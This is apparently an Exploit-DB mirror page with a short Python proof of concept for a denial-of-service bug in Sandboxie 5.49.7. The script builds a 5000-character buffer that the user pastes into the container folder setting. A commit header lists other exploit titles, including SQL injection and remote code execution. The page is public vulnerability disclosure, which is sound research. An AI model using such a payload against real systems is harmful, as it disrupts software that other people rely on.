exploit-db-mirror/exploits/windows/dos/49844.py
Offensive Security e4f4680368 DB: 2021-05-08
10 changes to exploits/shellcodes

Sandboxie 5.49.7 - Denial of Service (PoC)
Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
Epic Games Rocket League 1.95 - Stack Buffer Overrun

Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
Voting System 1.0 - Authentication Bypass (SQLI)
Voting System 1.0 - Remote Code Execution (Unauthenticated)
Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021
2021-05-08 05:01:52 +00:00

18 lines
No EOL
592 B
Python
Executable file

# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
# Date: 06/05/2021
# Author: Erick Galindo
# Vendor Homepage: https://sandboxie-plus.com/
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
# Version: 5.49.7
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Sandboxie Control->Sandbox->Set Container Folder
#3.- Paste the buffer in the input then press ok
buffer = "\x41" * 5000
f = open ("Sandboxie10.txt", "w")
f.write(buffer)
f.close()